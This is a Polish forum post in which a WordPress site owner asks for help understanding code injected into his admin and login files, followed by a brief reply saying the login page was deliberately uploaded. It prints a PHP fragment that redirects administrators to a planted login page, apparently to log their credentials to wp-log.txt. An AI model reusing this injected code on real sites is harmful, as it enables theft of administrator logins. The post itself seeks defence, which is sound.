Witam,
chciałbym was prosić o radę. Cały czas mam problemy z konkurencją, która próbuje mnie wykończyć na wszystkie możliwe sposoby. Jestem atakowany z różnych serwerów, mam doklejane różne kody do plików itd.
Ostatnio znalazłem takie coś:
wp-login.php
admin-footer.phpKod:function wp_attempt_focus(){ setTimeout( function(){ try{ d = document.getElementById('user_login'); d.value = ''; d.focus(); } catch(e){} }, 200); } wp_attempt_focus(); if(typeof wpOnload=='function')wpOnload();
Czy mógłby mi ktoś powiedzieć za co one odpowiadają te kawałki kodu oraz jak zabezpieczyć się przed takim czymś na przyszłość? Z tego co widzę zapisują one loginy i hasła logujących się osób do pliku wp-log.txt, ale chciałbym wiedzieć co wy o tym sądzicie.Kod:<?php global $current_user; get_currentuserinfo(); $wplog=file('wp-log.txt'); $log=base64_decode(trim($wplog[0])); if((($current_user->user_level) == 10) and (($current_user->user_login) !== $log) and (count($wplog) !== 6)){ echo '<meta http-equiv="refresh" content="0;url=wp-login.php" >'; } ?>
Nie mam już pomysłu jak uwolnić się od tych wszystkich ataków. Może wy coś wymyślicie.
Z góry dziękuje za odpowiedz.


LinkBack URL
About LinkBacks
Jeśli chodzi o stronę logowania to nie występuje ona w PA, więc cały plik został specjalnie wgrany.


